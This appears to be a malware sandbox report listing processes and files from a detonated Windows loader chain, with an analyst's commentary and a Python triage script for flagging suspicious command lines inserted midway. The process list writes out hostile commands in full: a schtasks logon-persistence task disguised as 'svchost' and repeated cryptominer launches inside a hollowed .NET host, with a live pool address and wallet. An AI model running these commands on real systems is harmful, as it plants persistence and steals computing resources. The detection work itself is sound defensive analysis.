"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa126546f8,0x7ffa12654708,0x7ffa12654718

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc262b5e-d8fa-469d-8120-04b015cdf2f1} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=1928 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2112,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50accd5e-44cf-4785-8112-a5dbe28bf6b0} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" socket

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3032 -childID 1 -isForBrowser -prefsHandle 3296 -prefMapHandle 3328 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94f8cef6-2f7c-4281-9f62-761d6a50fb73} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3788 -childID 2 -isForBrowser -prefsHandle 3208 -prefMapHandle 3004 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {788e0a73-7cb4-4bba-acf5-ce847c58a6ab} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2788 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4496 -prefMapHandle 4492 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f29bb8c9-085f-4c4c-9336-b973f0ce890b} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" utility

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3164 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 3 -isForBrowser -prefsHandle 5184 -prefMapHandle 5180 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97ef6b81-28b2-4565-ad55-2c2f46a448e0} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5432 -childID 4 -isForBrowser -prefsHandle 5424 -prefMapHandle 5420 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {323e5b80-a7b3-4a95-81ba-1cb9ddb4c4f7} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 5 -isForBrowser -prefsHandle 5648 -prefMapHandle 5548 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0e1585f-5c7f-4cf2-825c-2992fa7afdf4} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\1000029002\84743dcfde.exe

"C:\Users\Admin\1000029002\84743dcfde.exe"

C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6056 -ip 6056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 1100

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe

"C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "

C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe

clamer.exe -priverdD

C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe

"C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\ProgramData\xpmvhsd\agpphek.exe

C:\ProgramData\xpmvhsd\agpphek.exe

C:\Users\Admin\AppData\Local\Temp\pureee.exe

"C:\Users\Admin\AppData\Local\Temp\pureee.exe"

C:\Users\Admin\AppData\Local\Temp\adada.exe

"C:\Users\Admin\AppData\Local\Temp\adada.exe"

C:\Users\Admin\AppData\Local\Temp\dropperrr.exe

"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe

"C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=220,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3704 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:2

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 14DACB80DBDFC332DF65DB0A9EFEEEAC

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding CB04F01786E3B7FD6C6ED8BD6F4FAFDD E Global\MSI0000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /C "cd "C:\Program Files (x86)\COMODO\Endpoint Manager\" && "C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe" "

C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe"

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe"

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe" noui

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50
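Four things in the command lines above deserve a second look, and none of them is covered by the report's tags: schtasks.exe registers an ONLOGON task named "svchost" pointing at %APPDATA%\SubDir\svchost.exe; AddInProcess.exe, a Microsoft-signed .NET Framework host, runs with XMRig-style arguments (-o rx.unmineable.com:3333, -a rx for RandomX, an ETC payout address as the worker name, --cpu-max-threads-hint=50), so a miner has been injected into or hollowed that process; msiexec.exe installs a COMODO Endpoint Manager MSI from AppData\Roaming, i.e. a legitimate RMM agent delivered by the loader; and RegAsm.exe starts with no arguments at all, which is how hollowed .NET hosts usually appear. The triage rules below are an added example of mine, not the sandbox's signature logic; CMDLINES is a constructed subset of the Processes list plus one benign Chrome child as a control, and the DOTNET_HOSTS and SYSTEM_NAMES lists are my assumptions.

```python
"""Command-line triage for a sandbox process list.

Added example, not the sandbox's signature logic. CMDLINES is a
constructed subset of the Processes section above plus one benign
Chrome utility process as a control.
"""
import re
from collections import Counter

CMDLINES = [
    r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D997.tmp\D998.tmp\D999.bat C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe"',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"',
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
    r'"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f',
    r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50',
    r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US',
]

# Paths a standard user can write to (my heuristic).
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Users\\Public)\\", re.I)
# Signed .NET Framework hosts that loaders commonly hollow (assumed list).
DOTNET_HOSTS = {"addinprocess.exe", "regasm.exe", "regsvcs.exe",
                "msbuild.exe", "installutil.exe", "aspnet_compiler.exe"}
# Task names that impersonate core Windows processes (assumed list).
SYSTEM_NAMES = {"svchost", "csrss", "lsass", "winlogon", "explorer", "dwm"}


def split_image(cmdline):
    """Return (lower-cased image basename, remaining argument string)."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    exe = m.group(1) or m.group(2)
    return exe.rsplit("\\", 1)[-1].lower(), cmdline[m.end():].strip()


def triage(cmdline):
    """Return the list of rule names the command line trips (empty if clean)."""
    image, args = split_image(cmdline)
    hits = []
    task = re.search(r'/tn\s+"?([^"\s]+)"?.*?/tr\s+"([^"]+)"', args, re.I)
    if image.startswith("schtasks") and task and (
            task.group(1).lower() in SYSTEM_NAMES or USER_WRITABLE.search(task.group(2))):
        hits.append("schtasks-persistence")
    # XMRig-style options: a pool endpoint plus RandomX or a CPU thread hint.
    if re.search(r"(^|\s)-o\s+\S+:\d+", args) and re.search(
            r"(^|\s)-a\s+rx\b|--cpu-max-threads-hint", args):
        hits.append("miner-args-in-dotnet-host" if image in DOTNET_HOSTS else "miner-args")
    if image == "msiexec.exe" and re.search(r"/i\s", args, re.I) and USER_WRITABLE.search(args):
        hits.append("msi-from-user-path")
    # A .NET host needs an assembly to do anything; no arguments means someone else put code in it.
    if image in DOTNET_HOSTS and not args:
        hits.append("dotnet-host-no-args")
    if image == "cmd.exe" and re.search(r'/c\s+"*[^"]+\.bat', args, re.I) and USER_WRITABLE.search(args):
        hits.append("bat-from-user-path")
    return hits


def summarize(cmdlines):
    """Rule hit counts over a whole process list."""
    return Counter(h for c in cmdlines for h in triage(c))


if __name__ == "__main__":
    for c in CMDLINES:
        print(triage(c) or ["-"], c[:80])
    print(dict(summarize(CMDLINES)))
```

Against the constructed subset the two Chrome lines come back clean and the other six each trip exactly one rule; on a full process list the same rules would also catch the second schtasks invocation and every one of the repeated AddInProcess.exe miner launches.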

Network

Files

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe

C:\Users\Admin\AppData\Local\Temp\D997.tmp\D998.tmp\D999.bat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\crashpad_3076_SMBSHIXPNYFKTIKO

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5bce1c73-4e15-48ee-badb-cc5fa07fe769.tmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\23yzs2h6.default-release\activity-stream.discovery_stream.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\datareporting\glean\pending_pings\dfe01aea-b25b-40e5-8b7f-fbc9bf7bc3ad

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\datareporting\glean\pending_pings\35c152fe-cb4e-4900-b001-b5913734a791

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\datareporting\glean\db\data.safe.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\prefs.js

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\AlternateServices.bin

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\prefs-1.js

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

C:\Users\Admin\1000029002\84743dcfde.exe

memory/6056-471-0x0000000000400000-0x00000000031E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

memory/6056-522-0x0000000000400000-0x00000000031E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat

C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe

C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe

memory/7128-596-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\tmp4504.tmp

C:\Users\Admin\AppData\Local\Temp\tmp451A.tmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Temp\tmp4535.tmp

C:\Users\Admin\AppData\Local\Temp\tmp453B.tmp

C:\Users\Admin\AppData\Local\Temp\tmp4551.tmp

C:\Users\Admin\AppData\Local\Temp\tmp456C.tmp

memory/2144-821-0x00000000006E0000-0x0000000000BA4000-memory.dmp

memory/6328-822-0x0000000000D00000-0x00000000011C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\datareporting\glean\db\data.safe.tmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\23yzs2h6.default-release\cache2\entries\8A2034D325DC0B5C9E11EDDA3FC70A54C8DC1C0D

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\23yzs2h6.default-release\cache2\entries\0EA2E1AC3653A248EDE38E975FF2A4ADDA308244

